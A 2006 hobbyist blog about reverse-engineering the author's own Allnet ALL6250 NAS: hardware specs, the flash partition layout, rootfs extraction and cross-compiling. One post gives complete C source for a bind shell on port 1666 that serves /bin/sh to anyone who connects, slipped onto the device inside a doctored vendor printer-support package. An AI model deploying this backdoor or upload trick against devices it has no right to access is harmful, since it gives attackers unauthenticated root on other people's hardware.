Tuesday, January 24, 2006

I was too dumb

Ok, I must admit, I made an stupid misstake. The uClibc I compiled on my box was built against
my 2.6 kernel (that's been configured with devts support). I linked this statically to the telnet daemon :(

On the All 6250 there is no devpts, but BSD style pty's still do work. Only the device nodes where missing. But after all, I got a (hacked) utelnetd running on that box. Now that telnet DOES work, i am looking forward to do some more reasonable stuff.

I am still dissapointed about the missing kernel modules, but I think there are some userspce NFS servers around

Sunday, January 22, 2006

Show stopper :(

After fiddling around for some hours, trying to get an telnet deamon running,
I noticed why it won't work:

There is no devpts filesystem in the kernel !!

And sad enough, also modules are disabled!

So, the only possibility to make some reasonable progress is to compile a new kernel ...
There are no sources (yet) at allnet's dwonload site, but i'll ask them.

Saturday, January 21, 2006

Analysis so far

There are 6 mtd partitions:

mtd_ap_fs
mtd_boot_cfg
mtd_bootloader
mtd_kernel
mtd_linux_cfg
mtd_root_fs

These contain:
mtd_ap_fs : an tar.gz archive containing some files.
they are extracted to /sbin on boot

mtd_boot_cfg: configuration for the ppcboot bootloader
mtd_bootloader: The ppcboot 2.0.0 bootloader
mtd_kernel: The Linux kernel itself, as gzip compressed ppcboot image
mtd_linux_cfg: a .tar.gz file containing some config files. This files will be copied to /etc on boot:
smb.conf passwd config smbpasswd services hosts resolv.conf group
mtd_root_fs: The root fs (aka initrd). It is an ext2 fs image, gzip compressed, with ppcboot header.

To access it, do the following:
# dd if=mtd_root_fs of=rootfs.gz bs=64 skip=1
# gunzip rootfs.gz
Then, rootfs can be mounted over loopback as usual.


Gained Root Shell

After i finally got a harddisk for my ALL6250, i found an easy possibility to get a rootshell.
As said in my previous post, there is a file called ntx_libra.tgz on the support cd. This contained
a couple of executables. I replaced all the executables with my own "shell-server", uploaded the file, and whoops, i can nc to the ALL6250.

Steps:

a) write the Code ( i will post it somewhere)
b) install a crosscompiler
this is totally easy on gentoo:
# emerge crossdev;
# crossdev -s4 -t powerpc-linux-uclibc
c) compile it:
# powerpc-linux-uclibc-gcc -o ppc-shellserver -static shell-server.c
d) strip it:
# powerpc-linux-uclibc-strip ppc-shellserver

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <unistd.h>

extern char** environ;

#define DEFAULT_SERVER_PORT     1666

void sigchld_handler(int arg);

int main(int argcchar *argv[])
{
        int dev_null;
        int client_sock;
        int server_sock;
        int connected_to_socket = 0;
        int i = 0;
        struct sockaddr_in server_addr;
        
        /* detach from terminal */
        if (fork())
                return 0;
        
        /* get own SID */
        setsid();
        
        /* redirect stdin and stdout */
        dev_null = open("/dev/null"O_RDWR);
        if (dev_null != -1) {
                dup2(dev_null0);
                dup2(dev_null1);
                dup2(dev_null2);
        }
                
        /* create socket*/
        if ((server_sock = socket(AF_INETSOCK_STREAM0)) == -1) {
                return -1;
        }
        
        /* bind to tcp port */
        server_addr.sin_family = AF_INET;
        server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
        memset(&server_addr.sin_zero0sizeof(server_addr.sin_zero));
        
        while (!connected_to_socket) {
                server_addr.sin_port = htons(DEFAULT_SERVER_PORT + i);
                connected_to_socket = 1;

                /* bind socket */
                if ((bind(server_sock, (struct sockaddr *)&server_addr,
                        sizeof(struct sockaddr))) == -1)
                {
                        connected_to_socket = 0;
                        i++;
                        if (i > 10) {
                                close(server_sock);
                                return -1;
                        }
                }
        }

        /* listen */
        if ((listen(server_sock5)) == -1) {
                close(server_sock);
                return -1;
        }

        /* register sigs */
        signal(SIGCHLDsigchld_handler);

        for(;;) {

                /* accept */
                if ((client_sock = accept(server_sockNULL0)) == -1
                        continue;

                if (fork()) {
                        /* parent */
                        close(client_sock);
                        /* this one is only used in the child */
                } else {
                        const charargv_new[2];
                        /* child */
                        close(server_sock);
                        /* the above is used by the parent */

                        /* prepare for execve */
                        argv_new[0] = "/bin/sh";
                        argv_new[1] = NULL;
                        
                        /* redir stdin, stdout, stderr */
                        dup2(client_sock0);
                        dup2(client_sock1);
                        dup2(client_sock2);

                        /* replace this process w/ /bin/sh */
                        execve(argv_new[0], argv_newenviron);

                        /* we should never reach here ... */
                        return 0;
                }
        }
}

void sigchld_handler(int arg)
{
        int child_status;
        wait(&child_status);
}

Wednesday, January 18, 2006

Got the Device

Today, I got the Allnet (www.allnet.de) All6250 NAS. It is a relabelled netronix (www.netroxinc.com.tw) NH-230. The Hardware Specs are:

CPU: Freescale MPC8241 @ 266MHz
Memory: 4 x ESMT M12L128168A-7T
(this is 64MB, organized as 8Mx64)
FLASH: MXIC 29LV320ABTC-90 (4MB)
LAN: RealTec RTL8169 GBE
IDE: ITE IT8211F (only one channel available)
USB: Gensys Logic GL880S

There is a pin header for RS232. I will try to get some sort
of level shifter.

Firmware analysis so far:

neither allnet nor netronix do provide the sourcecode (yet).

nmap says it is a linux kernel in the range of 2.4.0 - 2.5.20
there are only ports open for:
a) http for setup on port 80
b) http general on 8080.

nothing else so far. (but i started it without harddisk)

on the support-cd, there is a file called ntx_libra.tgz .
It should be uploaded via the setup web-interface to
support an upnp printer server.

i extracted the file, and it contained a couple of executables:

root:/tmp/dxxx> file *
bt_clnt: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
lp: symbolic link to `lpd'
lpc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
lpd: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
lpq: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
lpr: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
lprm: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), stripped
ntx_chset.h: ASCII C program text
upnp_soho: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
watch_prog: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped

This definitively looks like a good starting point!

i will try to create my own nextra.tgz file, replacing all executables with my own, statically linked executable, that will open a root shell on some network port.